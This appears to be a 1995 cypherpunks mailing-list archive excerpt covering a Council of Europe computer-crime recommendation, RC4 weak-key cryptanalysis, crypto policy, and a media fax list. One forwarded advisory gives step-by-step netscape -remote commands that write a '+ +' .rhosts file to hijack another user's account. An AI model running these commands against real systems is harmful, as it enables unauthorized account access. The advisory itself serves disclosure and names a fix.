the specific nature of investigations in electronic information systems;

	Concerned by the potential risk that member states may not be able
to render mutual legal assistance in an appropriate way when requested to
collect electronic evidence within their territory from electronic
information systems;

	Convinced of the necessity of strengthening internation
co-operation and achieving a greater compatibility of criminal procedural
laws in this field;

	Recalling Recommendation No. R (81) 20 of the Committee of
Ministers on the harmonisation of laws relating to the requirement of
written proof and to the admissibility of reproductions of documents and
recordings on computers, Recommendation No. R. (85) 10 on letters rogatory
for the interception of telecommunications, Recommendations No. R (87) 15
regulating the use of personal data in the police state and
Recommendations No. R (89) 9 on computer-relating crime,

	Recommends the governments of member states:

i.	when reviewing their internal legislation and practice, to be
guided by the principles appended to this recommendation; and

ii.	to ensure publicity for these principles among those investigating
authorities and other professional bodies, in particular in the field of
information technology, which may have an interest in their application.

 
                Appendix to Recommendation No R. (95) 13

               concerning problems of criminal procedure law
                   connected with information technology

I. Search and seizure 
-----------------------------

1. The legal distinction between searching computers systems and siezing
data stored therein and intercepting data in the course of transmission
should be clearly delineated and applied.

2. Criminal procedure laws should permit investigating authorities to
search computer systems and seize data under similar conditions as under
traditional powers of search and seizure. The person in charge of the
system should be informed that the system has been searched and of the
kind of data that has been siezed. The legal remedies that are provided
for in general against search and seizure should be equally applicable in
case of search in computer systems and in case of seizure of data therein.

3. During execution of a search, investigating authorities should have the
power, subject to appropriate safeguards, to extend the search of other
computer systems within their jurisdiction which are connected by menas of
a network and seize the data therein, provided immediate action is
required.

4. Where automatically processed data is functionally equivalent to a
traditional document, provisions in the criminal procedure law relating to
search and seizure of documents should apply equally to it.

II. Technical Surveillance 
-------------------------------------

5. in view of the convergance of information technology and
telecommunications, law pertaining to technical surveillance for the
purpose of criminal investigations, such as interception of
telecommunications, should be reviewed and amended, where necessary, to
ensure their applicability.

6. The law should permit investigating authorities to avail themselves of
all necessary technical measures that enable the collection of traffic
data in the investigation of crimes.

7. When collected in the course of a criminal investigation and in
particular when obtained by means of intercepting telecommunications, data
which is the object of legal protection and processed by a compuer system
should be secured in an appropriate manner.

8. Criminal procedure laws should be reviewed with a view to making
possible the interception of telecommunications and the collection of
traffic data in the investigation of serious offenses against the
confidentiality, integrity and availability of telecommunications or
computer systems.


III. Obligations to co-operate with the investigating authorities
--------------------------------------------------------------------

9. Subject to legal privileges or protection, most legal systems permit
investigating authorities to order persons to hand over objects under
their control that are required to serve as evidence. In a parallel
fashion, provisions should be made for the power to order persons to
submit any specified data under their control in a computer system in the
form required by the investigating authority.

10. Subject to legal privileges or protection, investigating authorities
should have the power to order persons who have data in a computer system
under their control to provide all necessary information to enable access
to a computer system and the data theirin. Criminal procedure law should
ensure that a similar order can be given to other persons who have
knowledge about the functioning of the computer system or measures applied
to secure the data therein.

11. Specific obligations should be imposed on operators of public and
private networks that offer telecommunications services to the public to
avail themselves of all necessary technical measures that enable the
interception of telecommunications by the investigating authorities.

12. Specific obligations should be imposed on service providers who offer
telecommunications services to the public, either through public or
private networks, to provide information to identify the user, when so
ordered by the compentant investigating authority.


IV. Electronic Evidence 
------------------------

13. The common need to collect, preserve, and present electronic evidence
in ways that best ensure and reflect their integrity and irrefutable
authenticity, both for the purposes of domestic prosecution and
international co-operation, should be recognized. Therefore, procedures
and technical methods for handling electronic evidence should be further
developed, and particularly in such a way as to ensure their compatability
between states. Criminal procedural law provisions on evidence relating to
tradition documents should similarly apply to data stored in a computer
system.


V. Use of Encryption 
---------------------

14. Measures should be considered to minimise the negative effects of the
use of cryptography on the investigation of criminal offenses, without
affecting its legitimate use more than is strictly necessary.


VI. Research, statistics and training
-------------------------------------

15. The risks involved in the development and application of information
technology with regard to the commission of criminal offenses should be
assured continuously. In order to enable the competent authorities to keep
abrest of new phenomena in the field of computer related offenses and to
develop appropriate counter-measures, the collection and analysis of data
on these offenses, including modus operandi and technical apsects, should
be furthered.

16. The establishment of specialised units for the investigation of
offenses, the combating of which requires special expertise in information
technology, should be considered. Training programmes enabling criminal
justice personnel to avail themselves of expertise in this field should be
furthered.


VII. International Cooperation 
------------------------------

17. The power to extend a search to other computer systems should also be
applicable when the system is located in a foreign jurisdiction, provided
that immediate action is required. In order to avoid possible violations
of state sovereignity or international law, an unambigious legal basis for
such extended search and seizure should be established. Therefore, there
is an urgent need for negotiating international agreements as to how, when
and to what extent such search and seizure should be permitted.

18. Expedited and adequate procedures as well as a system of liason should
be available according to which the investigating authorities may request
the foreign authorities to promptly collect evidence.  For that purpose
the requested authorities should be authorized to search a computer system
and seize data with a view to its subsequent transfer.  The requested
authorities should also be authorized to provide trafficking data rtelated
to a specific telecommunication, intercept a specific telecommunication or
identify its source. For that purpose, the existing mutual legal
assistance instruments need to be supplemented.



_________________________________________________________________________
Subject: COE Document
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 29 Sep 95 04:02:31 PDT
To: "'cypherpunks@toad.com>
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306BD292@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



(This is a repeat because I posted the original 36 hours ago and it still   
hasn't bounced back to me.)


 -----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites


About a week ago I posted a message about weak keys in RC4. This is
an update on the results of my continued 4am sessions with RC4 and
shows that certain weak keys lead to an almost-feasible known
plaintext attack on the cipher (well, about as feasible as the
differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key
prefixes which have a high probability of producing PRNG sequences
which start with a known two-byte sequence. The prefixes are:

1.  Keys starting with "00 00 FD" which have a 14% probability of
    generating sequences which start "00 00".

2.  Keys starting with "03 FD FC" which have a 5% probability of
    generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is
1 in 65536 or about 0.0015%, so these key prefixes are highly
unusual. I won't go into the reasons why in this post, since it
follows the same reasoning as my last post, but these prefixes are
special in that they have a high probability of initializing the RC4
state table in such a way that the first two generated bytes depend
only on the first three entries in the state table.

This observation is the basis for a simple known-plaintext attack
which reduces the effective key space which you need to search to
have a 50% probability of discovering a key by about 11.2 bits. The
down side is that you need "quite a few" known plaintexts to make the
attack feasible.

It works as follows:

1.  Collect a large number of known plaintexts (and hence known
    generator sequences).

2.  Discard generator sequences which do not start with "00 00" or
    "FF 03".

3.  For generator streams starting "00 00", search all keys which
    begin with "00 00 FD".

4.  For generator streams staring "FF 03", search all keys which
    begin with "03 FD FC".

5.  Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys.
However since most generator sequences are discarded without being
searched, and for those which are searched the search is 2^24 smaller
than would be required to search the entire keyspace, the number of
trials required to determine a key is significantly lower than for
brute force alone.

Enough of an intro, here are the relevant results. Forgive my
simplistic approach to maths, I'm a philosopher-come-software
developer, not a mathematician. I've run the relevant simulations
with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two
different PRNGs. For the sake of consistency with my earlier paper
I'll use the figures gathered for 80-bit keys (this seems to be RSA's
preferred key length for RC4), but there are no significant
differences for other key lengths. The PRNG used for these tests was
L'Ecuyer's 32-bit combined linear congruential generator as described
in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD"
    generated sequences starting "00 00" 138217 times, and keys
    starting with "03 FD FC" generated output sequences starting "FF
    03" 50490 times.

(b) Out of ten million trials, arbitrary pseudo-random keys generated
    sequences starting with "00 00" 446 times, and sequences starting
    with "FF 03" 146 times. (Note the abnormally high incidence of
    "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key.
The chance that it will start with either "00 00" or "FF 03", and
that we will therefore search it, is:

    (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key
starting with "00 00 FD", or that it starts with "FF 03" and was
generated by a key starting "03 FD FC" - i.e. the chance that we will
search it and be rewarded for our efforts - is:

    (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will
discover one of the keys is:

    log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-)

And the number of plaintexts which you expect to search in order to
find the "right" one is:

    61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of
these, each search requires 2^56 trials. Hence the total number of
trials for a 50% chance of discovering a key is:

    3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance
of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have
tried, and in each case reduce effective key length by about 11.2
bits. So, for example, a 64-bit key would normally require 2^63
trials for 50% chance of solution; this attack reduces the number of
trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial
results are encouraging, I don't have enough data for it to be
statistically relevant yet (generating all these sets of 62 million
known streams takes time...) So consider this preliminary (again),
and I'll post the results of my simulations when I have enough
data.


Andrew

________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos


 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S
u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E
YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK
6xQ/Zy8JpE8=
=BdMn
 -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 29 Sep 95 10:28:47 PDT
To: cypherpunks@toad.com
Subject: Info War Comes Home
Message-ID: <199509291728.NAA27408@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note:  Whenever I do one of my longer pieces, it seems to drop into the
void.  Perhaps they are so well written and complete that no one can think
of any comment to make on them.  Perhaps not.  Read this one and comment.
You won't regret it.]

In honor of the Second Annual Conference on Information Warfare a few
weekends ago, here is my proposal towards a paper to be presented at next
year's conference.

*************************************************************************

                              The Mesh in the 'Hood


If any of you have not read every word of The Economist's Survey of Defence
Technology - "Softwar" in the June 10, 1995 issue --- shame on you.  Do so
immediately.

In that report, there is the following description of the future battlefield
without platforms (ships, aircraft, armor).  AKA the Mesh.

The Mesh is a network imposed over a landscape (what used to be called a
battlefield).  The network of sensors, smart munitions, small attack
modules, and perhaps human troops, shares information and kills enemies
moving through it.  Friendly forces travel through it as if it weren't
there.  It is "flat."  Hills and valleys disappear and expensive platforms
[tanks, helicopters, etc.] have nowhere to hide since it is co-extensive
with the whole territory it covers.  It is also tough because it is hard to
destroy enough parts of it to make a difference.  Nuclear munitions might
destroy a Mesh or imposing a stronger Mesh over an existing one might work
if you didn't mind wholesale destruction but defeating it without massive
destruction is hard.

To quote from the Survey:

"The mesh has a number of advantages. It is hard to attack, because its
strength is spread widely. It is hard to damage, because there are so many
communication paths. Many small sensors can provide a better picture than a
few large ones. More sensors allow the information domain to conform more
closely to the physical terrain. At the moment line-of-sight detection by
sensors in a widespread network leaves topographical blind spots--wadis,
narrow valleys--in which platforms such as attack helicopters can lurk."

"While nets may see through the fog of war, meshes also tackle another of
the problems von Clausewitz identified; war's friction. The mesh is a
war machine with almost no moving parts, save the actual warheads of the
weapons. It is a solid-state device; its mechanisms have migrated far
into the spectral dimension of information, leaving only a thin skeleton
framework in the world of height, breadth and depth."

It certainly makes for a challenging war environment.  The Mesh is created
by warriors to effectively serve warriors' ends, I would like to suggest the
possibility that civilians might create their own Mesh to serve their ends.

A Mesh is Just a Net with Attitude

The Internet is (as we all know) a network of interconnected computers that
cooperate to exchange information in a standardized fashion.  Its purpose is
communication.  If its purpose is extended, it can become a Mesh.

Assume that the Net has grown in size and importance so that a significant
portion of the population in a given geographic area is fully wired ---
hardly a dramatic assumption.

All of those machines are cooperating to enable the various sorts of
communications that people want to use the Net for.  Some of those machines
are already connected to external cameras to do "silly" things like put
pictures of Stockholm on the WWW.

What if people connected other things to the Net?

While it is unlikely that most people will put a chain gun in the window and
interface it with the Net anytime soon, other useful connections are possible.  

[And even in the case of weaponry, specific neighborhoods might be
interested in doing creative things now.  Thus Bo Grtiz' heavily armed,
Patriot, Recreational Subdivision in Idaho might find a use for the Mesh.
And won't those Black Helicopters be surprised.]   

More peaceful civilians might deploy a Mesh to protect themselves against
bad people whether official or unofficial.  Like the existing Speedtrap website 
(http://www.nashville.net/speedtrap/) but in real time, cameras and passive
sensors could track the minions of the State as they cruise through
neighborhoods.  They could also multicast live, full color, and audio images
of arrests and less formal interactions with the authorities.  Fans of
Robert Heinlein will recall that Jubal Harshaw used a version of this
strategy in "Stranger in a Strange Land."  Cops behave better when they are
on camera (and know it.)  The Net allows everyone to play.   

END OF PART I  (More next week).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bwern@jax.jaxnet.com (Ben Wern)
Date: Fri, 29 Sep 95 11:02:11 PDT
To: cypherpunks@toad.com
Subject: HP Lobbies for Exportable Crypto
Message-ID: <199509291809.OAA13405@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


From the 28th of September's EDUPAGE:


HP LOBBIES FOR EXPORTABLE ENCRYPTION PLAN
Hewlett-Packard has developed an encryption strategy with the French
company Gemplus SCA that they're hoping will pass the tough scrutiny of
U.S. export controllers.  The plan takes a two-pronged approach -- an
"encryption engine" that works in conjunction with a code-making formula
that can be adjusted to any level deemed acceptable by the U.S. government,
and a policy card that would be reviewed on a case-by-case basis by the
State Department. The flexible system is designed to adapt to changing
government policies, and could even accommodate a key escrow system like the
Clipper chip. "There was a lot of skepticism when HP first proposed it.  But
it looks to me that they are well on the way to the next step," says a
former encryption specialist at the National Institute of Standards and
Technology.  (Wall Street Journal 27 Sep 95 B7)



Ben Wern
bwern@jaxnet.com | bwern@pathtech.com | bwern@unf.edu
                            SAY NO TO TALKING COWS!
     -------------------------------------------------------------------------
      "We are more than the sum of our knowledge, we are
                       the products of our imagination." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 29 Sep 95 12:11:22 PDT
To: cypherpunks@toad.com
Subject: This fax list is 95% accurate!
Message-ID: <199509291911.MAA13112@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry the whole HTML is here,
however, if you now want to 
make "A CYPHERPUNK SPEAKS....."
Press Release, this fax list 
will do it for you, only two
or three numbers are unverified!
(and that's as of today!)


<html>

<head>
<title>
Fearless Fax Numbers Revised 9-29-95
</title>
</head>
<center>
<h1>Transgender Lobby Days Website</center>
</center>
<pre>

I promised last week that I would send this out when the idea of a
blanket-fax-campaign for a c-punks press release was being discussed.
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network
_nor_ the Eye on America show, but I'm sure we'll find those numbers
somewhere.

I got it from the Iron Feather Journal, volume 14.  I have no reason to
believe that any of these numbers are incorrect, but some of them may
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321
CBS TV 		    San Francisco	1-415-362-7417
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
ESPN		    Bristol CT		1-800-592-3776
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
KFAN AM	     Minneapolis		1-612-820-4265
Kostabi Media		New York	1-212-925-3055
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News President New York NY	1-212-315-4037
NBC TV	  	    Los Angeles		1-818-840-4275
Newsweek	    Washington, D.C. 	1-202-783-6512
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-602-839-2872  Tracy Stephenson
Sports Fan Radio Net  Las Vegas NV      1-702-737-1906
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-955-2049
Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams

</pre>
carolann@censored.org
</html>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 29 Sep 95 11:41:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509290659.XAA09185@ix7.ix.netcom.com>
Message-ID: <9509291841.AA29412@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


>I for one am against any kind of GAK on moral grounds.  I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

If people care to look at my very old Shen work they will see a key
escrow facility. This was installed becase as a network administrator
at a sensitive site.

I'm a big fan of key escrow. I just don't think I should be forced to 
use it on a public network by a government. I need the ability to secure 
internal channels inside certain sites however. I don't think I want the 
Whitehouse running with each staffer providing their own personal encryption 
system.


	Phill.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 28 Sep 95 23:32:30 PDT
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
Message-ID: <199509290423.AA52917@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>person for Hewlett-Packard (about the HP internal net with 19
>worldwide connections to the Internet - by the way, allegedly
>no one has ever succeeded in breaking their firewalls)

I am unable to discuss the details of this (so dont ask), but HP's firewall
was breached way back in the early 90's. The breach was not discovered, more
upgraded over so I am unsure as to wether it is still open.

Blanket statements such as company X or firewall Y not being breached are
almost always false. One annecdote is a domain installed a firewall but didnt
bother to examine their internal hosts security. This was a mistake because
a number of hosts were *already* trojaned so an outsider could trigger the
mechanisms to allow entry seamlessly through the firewall. This is a good
arguement for keeping OS versions current.

Have a nice day.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 29 Sep 95 15:26:06 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <doug-9508291335.AA00652565@netman.eng.auburn.edu>
Message-ID: <199509292225.PAA25735@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Doug Hughes <Doug.Hughes@Eng.Auburn.EDU> writes:
> It seems to be a OTP/stream cipher of some kind.. subsequent number depending
> on previous numbers. I don't know if its possible to prove that the sequence
> will never repeat, having not seen the algorithm. But if it did not, it would
> seem to be strong enough. Too many questions, too few answers.

It does seem to be a stream cipher of some kind.  Subsequent numbers
depending on previous numbers means that it's an autokey cipher.  That
most assuredly does <not> make it a one time pad, no matter whether it
ever repeats or not (which it presumably wouldn't).

Here's an easy way to demonstrate that the strength of this system is less
than a one time pad.  Let's give the attacker all the breaks: he knows the
initial secret key, he has watched the key exchange from both sides by
monitoring all keystrokes, and has access to all the keying information
and plaintext and ciphertext that has happened from day 0 until now, day
30, but none of the plaintext or other keying information thereafter.

Case one: the system you're flogging.  He can keep reading the mail.
Case two: a true one time pad.  He immediately loses touch with the system
          as soon as they go to the first unknown byte of the one time
          pad.

I sympathize with their desire to call it a one time pad, since that has
obvious marketing cachet.  But it isn't -- can't they simply say they
think it's a nice strong cipher?

	Jim Gillogly
	Sterday, 8 Winterfilth S.R. 1995, 22:21




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Fri, 29 Sep 95 12:37:11 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Info War Comes Home
In-Reply-To: <199509291728.NAA27408@panix.com>
Message-ID: <Pine.SUN.3.91.950929145750.9935A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Sep 1995, Duncan Frissell wrote:

> [Note:  Whenever I do one of my longer pieces, it seems to drop into the
> void.  Perhaps they are so well written and complete that no one can think
> of any comment to make on them.  Perhaps not.  Read this one and comment.
> You won't regret it.]
> 
> In honor of the Second Annual Conference on Information Warfare a few
> weekends ago, here is my proposal towards a paper to be presented at next
> year's conference.

A couple of things jump to mind:

Though I know you only used War as a metaphor, even that rubs me the
wrong way.  I don't like wars or people who fight them--namely States,
bullies (BIG bullies), and other Territorial Gangsters.  It's an
authoritarian, hierarchical model, even though I realize you're using
it loosely.  Your piece is very short on details, but the few you give
all employ the War metaphor: "neighborhood defense," sensors, video
cameras, etc.

I have no problem with some of these things per se, especially if
they're targeted against the State, but I also have no interest in
living in a kind of permanent war zone.  This strikes me as a negative
approach versus the more positive approach of, say, mutual assistance
groups like the "tong."  (Hakim Bey wrote an excellent essay on tongs
and their applicability to modern anarchist groups, btw.  If anyone's
interested, send me an email message with subject "TONG PLEASE" and
it'll be sent to you automatically.)

Anyone attracted by the idea of urban warfare should read Mike Davis's
excellent "City of Quartz."  He's talking about the modern city
(specifically, L.A.) as a war zone pitting _haves against have-nots,_
but the idea is the same, and it's scary as hell.

I'm ambivalent, to say the least, about the mania for getting
everything in the world WIRED, but if you want to convince me you'll
have to come up with a model that offers me something _constructive._

Cheers.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Fri, 29 Sep 95 06:59:39 PDT
To: cypherpunks@toad.com
Subject: Netscape hole without .Xauthority (fwd)
Message-ID: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
MIME-Version: 1.0
Content-Type: text/plain



Haven't seen this on the cypherpunks yet, sorry if this has been here 
already. 

Juri

<o       Jri Kaljundi          e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<

---------- Forwarded message ----------

There's a huge hole in the Netscape remote control mechanism for the
X-Windows based clients. 
Potential impact : anybody can become any user that uses Netscape on any
system without sufficient X security.

Let's suppose that you have an account on a target machine, where somebody
is using Netscape, and either the xhost checking is disabled, or you can
set the xhost yourself (e.g. if you have an account and the target user has
no .Xauthority, as is frequent in university computer rooms).
Then you can gain access to the target user's account using the following
steps :

- make a text file containing only "+ +" accessible (as file, as URL, or
  whatever you like) to the target Netscape client. This is quite easy, either
  if you have a personal WWW page (http://... URL) or an account on the
  target machine (file://... URL), or even by uploading it to an anon FTP

- set your DISPLAY environment variable to the target display

- run the following set of commands :

  netscape -noraise -remote "openURL(<put-your-URL-here>)"
  netscape -noraise -remote "saveAs(.rhosts)"
  netscape -noraise -remote back

In the second command, the path should be specified whenever possible 
(~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that
precise moment, then the chances are it worked !

Solution to the problem : every user concerned should either create a 
Xauthority file, or stop using Netscape.

	MXK


PS: WHY do they bother with PGP and RSA security when they keep such holes ????

+------------------------------------+---------------------------------+
|  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
|  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
|  75005 PARIS FRANCE                | 75005 PARIS                     |
|  email: auroux@clipper.ens.fr      | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 29 Sep 95 16:27:27 PDT
To: cypherpunks@toad.com
Subject: Web "places" and the media monsters
Message-ID: <199509292319.QAA21372@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



below is an interesting excerpt from Boardwatch magazine, which I find
to be a good source for internet/web/BBS coverage. it talks about how
the Web, to continue its momentum, may evolve into something like
BBSes that give the sense of an online community..

also, I recently read a chapter from an upcoming book, I think it was
by Negroponte, and he pointed out how the web/gopher servers did not
really explode until the introduction of Mosaic and an *image* standard
was put into HTML. (to this I would add forms capability-- buttons, etc.)
This suggests that the success of the Web is really highly predicated
on the easy-to-use interface of Web browsers, and the nice visual presentation
given by images etc.  in other words, the "hypertext" capabilities, while
tremendous, were not necessarily the *key* factors in driving its use, but
when coupled with these other ingredients, really pushed it all "over the
top".

this makes a lot of sense to me. the human being is very visually oriented
(large amounts of brain capacity are dedicated to processing images). I think
the days of computer programs as "lines of text scrolling up the screen" are
increasingly numbered because of this. the easy-to-use GUI will be the model
of most future software for a long time.

in addition to this, I would add that I suspect that as soon as web pages 
begin to convey a sense of community (as
mentioned in this column), through conferences etc., the growth of the 
web will increase even more dramatically.. I also continue to believe
that "groupware" will prove to be a very important aspect of future web
development.. (so I agree with TCM that isolated software packages that
do not really integrate with the web to do groupware are going to eventually
go extinct).

the thoughts in this column also tie in with the recent NYT Levy column
in which Levy pointed out how the internet is an entirely new medium
for broadcasting in which the individual has total freedom and egalitarianism 
that cannot be found in any other medium of the past, and that for this reason 
all the recent frenzied, slobbering  media mergers are actually "rearranging
the deck chairs on the titanic" (he credits J.Gilmore for this quote, who 
seems to have an amazing propensity for great soundbites). 

I agree with this wholeheartedly. the big media conglomerates are going to
be quite terrified when they eventually realize that the main thing they
are providing is a *distribution channel*, and that these very costly 
distribution channels are all obsoleted (sorry to verb that word <g>) by
the introduction of cyberspace for the masses. artists are free to try
to reach the audience in whatever means they see fit; they are no longer
dependent on the media machines to make a living. I have talked to various
musicians for example who find that they can create their own CDs through
individually contracting with various companies and make far more in profit 
than they can from going with record companies (who shave off enormous amounts 
of artist profit to feed the machine).

an amusing pink floyd song that has a biting satire of a 
record company executive. "the band is just fantastic!! that's really
what I think!! oh by the way, which one's pink?? oh, have you seen 
the charts?? everyone else is just green!! this could be made into a 
monster if we all pull together as a TEAM!!"

